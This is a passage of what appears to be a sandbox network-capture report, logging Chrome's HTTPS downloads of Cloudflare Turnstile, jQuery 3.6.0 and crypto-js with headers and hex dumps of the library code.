                                                                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                                        Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                                        Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                        Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                                        Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                                        Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.1749748151.101.194.1374431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:33 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                        Host: code.jquery.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:33 UTC613INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 89501
                                                                                                        Server: nginx
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 09 Jan 2025 16:18:33 GMT
                                                                                                        Age: 1924040
                                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740040-EWR
                                                                                                        X-Cache: HIT, HIT
                                                                                                        X-Cache-Hits: 2774, 4
                                                                                                        X-Timer: S1736439514.580040,VS0,VE0
                                                                                                        Vary: Accept-Encoding
                                                                                                        2025-01-09 16:18:33 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                        2025-01-09 16:18:33 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                        2025-01-09 16:18:33 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                        2025-01-09 16:18:33 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                        2025-01-09 16:18:33 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                        2025-01-09 16:18:33 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.1749749104.17.25.144431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:33 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:33 UTC957INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:33 GMT
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                        ETag: W/"61182885-40eb"
                                                                                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Timing-Allow-Origin: *
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 97324
                                                                                                        Expires: Tue, 30 Dec 2025 16:18:33 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=am9b25%2FSUDtdRBRioZpzBR2PL48nmDg4S3Q2PckUGDXOf3SrEhVne7ciL2A7%2BAL7cjsl5D0liTOVFQ0kYMZvwhIq29Nj%2BNWjjGWRVNmjkWnecDFaOlo0w7EVEho90xVHOI5Rpa3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be704bd10c94-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:33 UTC412INData Raw: 37 62 66 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                        Data Ascii: 7bf4!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74
                                                                                                        Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.creat
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74
                                                                                                        Data Ascii: ll(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)t
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61
                                                                                                        Data Ascii: of t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a
